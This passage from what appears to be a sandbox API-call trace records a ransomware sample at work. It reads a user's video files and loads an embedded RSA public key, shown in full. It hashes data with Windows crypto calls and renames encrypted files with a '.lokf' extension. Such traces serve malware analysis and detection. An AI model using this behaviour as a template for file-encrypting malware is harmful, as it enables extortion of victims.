hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.617] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0xf970, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0xf970, lpOverlapped=0x0) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.617] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.617] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.618] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0060.618] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.618] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.618] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.618] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.618] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.618] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.618] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.618] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.618] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.618] CloseHandle (hObject=0x5cc) returned 1 [0060.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.619] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290398 | out: hHeap=0x660000) returned 1 [0060.619] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\UEUtG KZ03LCY HCeSa.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\ueutg kz03lcy hcesa.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\UEUtG KZ03LCY HCeSa.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\ueutg kz03lcy hcesa.mkv.lokf")) returned 1 [0060.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.620] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.621] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdfa0a0, ftCreationTime.dwHighDateTime=0x1d4ca2e, ftLastAccessTime.dwLowDateTime=0xfb8ab040, ftLastAccessTime.dwHighDateTime=0x1d4c76d, ftLastWriteTime.dwLowDateTime=0xfb8ab040, ftLastWriteTime.dwHighDateTime=0x1d4c76d, nFileSizeHigh=0x0, nFileSizeLow=0x76e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YGVwuDjMl2Ykk_YA8hkk.flv", cAlternateFileName="YGVWUD~1.FLV")) returned 1 [0060.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.621] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\YGVwuDjMl2Ykk_YA8hkk.flv") returned=".flv" [0060.621] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\YGVwuDjMl2Ykk_YA8hkk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\ygvwudjml2ykk_ya8hkk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.621] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=30436) returned 1 [0060.621] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.623] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x76be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.623] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.624] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.624] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x76e4, lpOverlapped=0x0) returned 1 [0060.624] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.624] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.624] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.624] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.624] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.625] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.625] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.625] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.625] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.625] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.625] GetLastError () returned 0x0 [0060.625] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.625] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.625] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.625] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.626] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.626] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76e0) returned 0x9c8bae8 [0060.626] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89760 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f20 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c897a8 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f38 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f68 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f80 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.626] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f68 | out: hHeap=0x660000) returned 1 [0060.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f80 | out: hHeap=0x660000) returned 1 [0060.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0060.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f80 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85f68 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f80 | out: hHeap=0x660000) returned 1 [0060.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f68 | out: hHeap=0x660000) returned 1 [0060.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.627] GetCurrentThreadId () returned 0x9e0 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8b330 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.628] GetCurrentThreadId () returned 0x9e0 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f68 [0060.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f80 [0060.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f50 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f98 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f68 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f68 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f68 | out: hHeap=0x660000) returned 1 [0060.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f98 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f80 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f50 | out: 